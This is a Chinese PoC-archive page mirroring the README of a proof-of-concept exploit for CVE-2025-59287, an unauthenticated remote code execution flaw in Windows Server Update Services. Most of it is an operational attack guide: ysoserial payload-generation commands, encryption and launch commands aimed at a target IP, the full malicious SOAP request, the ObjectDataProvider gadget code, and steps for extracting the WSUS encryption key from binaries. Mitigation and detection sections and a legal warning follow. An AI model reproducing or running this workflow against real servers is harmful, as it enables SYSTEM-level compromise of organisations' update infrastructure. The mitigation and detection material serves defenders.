关联漏洞
描述
Exploitation proof-of-concept for CVE-2025-59287 - a critical vulnerability in the Windows Server Update Service (WSUS) caused by the deserialization of untrusted data. This flaw allows an unauthorized attacker to execute arbitrary code over a network, posing a significant security risk.
介绍
# CVE-2025-59287 Proof-of-Concept Exploit
## Vulnerability Overview
**CVE-2025-59287** is a critical Remote Code Execution (RCE) vulnerability in Microsoft Windows Server Update Services (WSUS). The vulnerability is caused by unsafe deserialization of `AuthorizationCookie` data through `BinaryFormatter` in the `EncryptionHelper.DecryptData()` method.
**Impact**: Unauthenticated attackers can achieve remote code execution with **SYSTEM privileges** by sending malicious encrypted cookies to the `GetCookie()` endpoint.
**CVSS Score**: Critical (9.8)
## Vulnerability Details
- **Affected Component**: WSUS ClientWebService.asmx GetCookie() endpoint
- **Root Cause**: `BinaryFormatter.Deserialize()` called on untrusted input without proper validation
- **Attack Vector**: Malicious encrypted cookie sent to GetCookie() SOAP endpoint
- **Authentication Required**: **No** (unauthenticated RCE)
- **Affected Ports**: 8530 (HTTP), 8531 (HTTPS)
## Architecture
```
┌─────────────────┐
│ Attacker │
│ │
│ 1. Generate │
│ BinaryFmt │
│ Payload │
│ │
│ 2. Encrypt │
│ Payload │
│ │
│ 3. Send SOAP │
│ Request │
└────────┬────────┘
│
▼
┌─────────────────┐
│ WSUS Server │
│ │
│ GetCookie() │
│ Endpoint │
│ │
│ DecryptData() │◄─── Vulnerable
│ │
│ BinaryFormatter│◄─── Unsafe Deserialization
│ Deserialize() │
│ │
│ Execute │◄─── RCE as SYSTEM
│ Payload │
└─────────────────┘
```
## Files Structure
```
exploit-poc/
├── wsus_exploit.py # Main exploit script
├── BinaryFormatterPayloadGenerator.cs # .NET payload generator (C#)
├── encrypt_payload.py # WSUS encryption helper
├── requirements.txt # Python dependencies
└── README.md # This file
```
## Prerequisites
### Python Environment
```bash
pip install -r requirements.txt
```
### .NET Framework (for payload generation)
- Windows with .NET Framework 4.0 or later
- Or use `ysoserial.net` as alternative
## Usage
### Method 1: Complete Workflow
#### Step 1: Generate BinaryFormatter Payload
**Option A: Using provided C# generator**
```bash
# Compile the generator
csc /reference:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\WindowsBase.dll" BinaryFormatterPayloadGenerator.cs
# Generate payload
BinaryFormatterPayloadGenerator.exe calc.exe
# Creates: payload_YYYYMMDDHHMMSS.bin
```
**Option B: Using ysoserial.net (Recommended)**
```bash
ysoserial.exe -g ObjectDataProvider -f BinaryFormatter -c "calc.exe" -o raw > payload.bin
```
#### Step 2: Encrypt the Payload
```bash
python encrypt_payload.py payload.bin -o encrypted_cookie.txt
```
**IMPORTANT**: The encryption key in `encrypt_payload.py` is a **placeholder**. For real exploitation, you must:
1. Reverse engineer the actual encryption key from WSUS binaries
2. Update `encrypt_payload.py` with the real key
3. See "Finding WSUS Encryption Key" section below
#### Step 3: Execute the Exploit
```bash
# Using payload file (will encrypt on-the-fly)
python wsus_exploit.py -t 192.168.1.100 -f payload.bin
# Using pre-encrypted cookie
python wsus_exploit.py -t 192.168.1.100 -e "$(cat encrypted_cookie.txt)"
# With HTTPS (port 8531)
python wsus_exploit.py -t wsus.example.com -p 8531 -f payload.bin
```
### Method 2: Quick Test
```bash
# Generate, encrypt, and exploit in one go
BinaryFormatterPayloadGenerator.exe calc.exe
python wsus_exploit.py -t <TARGET_IP> -f payload_*.bin
```
## Finding the Actual WSUS Encryption Key
The encryption key **must** be extracted from WSUS binaries for real exploitation.
### Method 1: Reverse Engineering with dnSpy
1. **Locate WSUS DLLs**:
```
%ProgramFiles%\Update Services\WebServices\bin\
```
Or IIS web directory:
```
%SystemDrive%\inetpub\wwwroot\wsusadmin\
```
2. **Open in dnSpy** (free .NET decompiler):
- Download: https://github.com/dnSpy/dnSpy
- Open `Microsoft.UpdateServices.WebServices.dll`
3. **Search for EncryptionHelper**:
- Navigate to: `Microsoft.UpdateServices.WebServices` namespace
- Find `EncryptionHelper` class
- Look at `DecryptData()` and `EncryptData()` methods
- Extract the encryption key and algorithm
4. **Common patterns**:
- Hardcoded byte arrays
- String constants
- Key derivation from machine GUID/SID
### Method 2: Runtime Analysis
1. **Use WinDbg or x64dbg**:
- Set breakpoint on `EncryptionHelper.DecryptData()`
- Inspect memory/registers for key material
- Monitor encryption/decryption operations
2. **Use Process Monitor**:
- Filter by WSUS process
- Look for registry/config file access
- Keys might be stored in registry
### Method 3: Static Analysis
1. **Use IDA Pro or Ghidra**:
- Load WSUS binaries
- Search for encryption-related strings
- Analyze key derivation algorithms
2. **Use strings utility**:
```bash
strings Microsoft.UpdateServices.WebServices.dll | grep -i key
strings Microsoft.UpdateServices.WebServices.dll | grep -i encrypt
```
### Updating the Exploit
Once you have the actual key, update `encrypt_payload.py`:
```python
# Replace this line in encrypt_wsus_cookie():
key_material = b"WSUS_Cookie_Encryption_Key_v1.0" # PLACEHOLDER
# With the actual key:
key_material = b"ACTUAL_KEY_FROM_WSUS_BINARIES"
```
Or pass it via command line:
```bash
python encrypt_payload.py payload.bin -k "ACTUAL_KEY"
```
## Exploit Flow
```
┌─────────────────────────────────────────────────────────────┐
│ 1. Generate BinaryFormatter Payload │
│ ObjectDataProvider → Process.Start() → Command Execution │
└───────────────────────┬─────────────────────────────────────┘
▼
┌─────────────────────────────────────────────────────────────┐
│ 2. Encrypt Payload │
│ AES-128-CBC with WSUS encryption key │
│ Base64 encode for transmission │
└───────────────────────┬─────────────────────────────────────┘
▼
┌─────────────────────────────────────────────────────────────┐
│ 3. Create SOAP Request │
│ AuthorizationCookie header contains encrypted payload │
│ GetCookie() method in SOAP body │
└───────────────────────┬─────────────────────────────────────┘
▼
┌─────────────────────────────────────────────────────────────┐
│ 4. Send to WSUS Endpoint │
│ POST /ClientWebService/ClientWebService.asmx │
│ Port 8530 (HTTP) or 8531 (HTTPS) │
└───────────────────────┬─────────────────────────────────────┘
▼
┌─────────────────────────────────────────────────────────────┐
│ 5. WSUS Processing │
│ DecryptData() decrypts cookie │
│ BinaryFormatter.Deserialize() executes payload │
│ → RCE as SYSTEM │
└─────────────────────────────────────────────────────────────┘
```
## SOAP Request Structure
```xml
POST /ClientWebService/ClientWebService.asmx HTTP/1.1
Host: <TARGET>:8530
Content-Type: text/xml; charset=utf-8
SOAPAction: http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService/GetCookie
User-Agent: WSUS Client
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<AuthorizationCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService">
BASE64_ENCRYPTED_BINARYFORMATTER_PAYLOAD
</AuthorizationCookie>
</soap:Header>
<soap:Body>
<GetCookie xmlns="http://www.microsoft.com/SoftwareDistribution/Server/ClientWebService">
<cookieType>AuthorizationCookie</cookieType>
</GetCookie>
</soap:Body>
</soap:Envelope>
```
## Payload Generation Details
The exploit uses the `ObjectDataProvider` gadget chain:
```csharp
ObjectDataProvider provider = new ObjectDataProvider();
provider.ObjectInstance = new Process();
provider.MethodName = "Start";
provider.MethodParameters = new Collection<object> { processStartInfo };
```
When `BinaryFormatter.Deserialize()` processes this, it automatically:
1. Deserializes the `ObjectDataProvider`
2. Invokes the `MethodName` ("Start") on `ObjectInstance` (Process)
3. Passes `MethodParameters` (ProcessStartInfo)
4. Executes the command with SYSTEM privileges
## Testing Checklist
- [ ] Generate BinaryFormatter payload
- [ ] Extract/identify WSUS encryption key
- [ ] Encrypt payload with correct key
- [ ] Verify WSUS endpoint is accessible
- [ ] Send SOAP request with malicious cookie
- [ ] Verify command execution on target
- [ ] Test in isolated lab environment
## Limitations
1. **Encryption Key**: Placeholder key won't work on real systems. Must extract actual key.
2. **BinaryFormatter Payload**: Requires .NET Framework or ysoserial.net to generate.
3. **Network Access**: Must have network access to WSUS endpoint (ports 8530/8531).
4. **WSUS Version**: Behavior may vary across WSUS versions.
## Mitigation
### Immediate Actions
1. **Apply Microsoft Security Update**: Patch immediately
- Check Microsoft Security Advisory
- Update WSUS to patched version
2. **Temporary Workaround**: Block ports if WSUS not needed
```powershell
# Block inbound traffic on WSUS ports
New-NetFirewallRule -DisplayName "Block WSUS" -Direction Inbound -LocalPort 8530,8531 -Protocol TCP -Action Block
```
3. **Network Segmentation**: Restrict access to WSUS endpoints
- Only allow access from authorized update servers
- Use firewall rules to limit source IPs
### Long-term Fixes
1. **Replace BinaryFormatter**: Microsoft should replace with secure serialization
- Use `System.Text.Json` or `System.Xml.Serialization` with type validation
- Implement strict type allowlisting
2. **Input Validation**: Add comprehensive validation
- Validate all cookie data before deserialization
- Reject unexpected types/schemas
3. **Principle of Least Privilege**: Run WSUS services with minimal privileges
- Don't run as SYSTEM if possible
- Use service accounts with limited permissions
## Detection
### Indicators of Compromise (IoC)
- Unusual network traffic to port 8530/8531
- SOAP requests with Base64-encoded AuthorizationCookie headers
- Unexpected process execution from WSUS service context
- BinaryFormatter deserialization exceptions in WSUS logs
### Log Analysis
Check WSUS logs for:
```
%ProgramFiles%\Update Services\LogFiles\
```
Look for:
- SOAP request errors
- Deserialization exceptions
- Unauthorized access attempts
### Network Monitoring
Monitor for:
- SOAP requests to `/ClientWebService/ClientWebService.asmx`
- Large Base64 payloads in AuthorizationCookie headers
- Unusual command execution from WSUS service
## Legal Notice
**⚠️ WARNING**: This exploit code is provided for **authorized security testing only**.
- ✅ **Legal Uses**:
- Testing your own systems
- Authorized penetration testing
- Security research with permission
- Educational purposes in controlled environments
- ❌ **Illegal Uses**:
- Unauthorized access to systems
- Malicious attacks
- Violation of computer fraud laws
- Any use without explicit permission
**Unauthorized use of this exploit may result in criminal prosecution. Use responsibly and ethically.**
## References
- **CVE-2025-59287**: Official CVE entry
- **Microsoft Security Advisory**: Check for official patch and guidance
- **BinaryFormatter Security Guide**: https://docs.microsoft.com/en-us/dotnet/standard/serialization/binaryformatter-security-guide
- **ysoserial.net**: https://github.com/pwntester/ysoserial.net
## Credits
- Vulnerability discovered by security researchers
- PoC developed for educational and authorized testing purposes
## Version History
- **v1.0**: Initial PoC release
- Main exploit script
- .NET payload generator
- Encryption helper
- Documentation
---
**Remember**: Always test in isolated, controlled environments. Never use against systems you don't own or lack explicit permission to test.
文件快照
[4.0K] /data/pocs/436050fd427a81d9aa43ad102a63f73601bb1451
├── [5.4K] BinaryFormatterPayloadGenerator.cs
├── [3.1K] compile_payload_generator.bat
├── [5.6K] encrypt_payload.py
├── [ 14K] README.md
├── [ 59] requirements.txt
└── [9.4K] wsus_exploit.py
1 directory, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。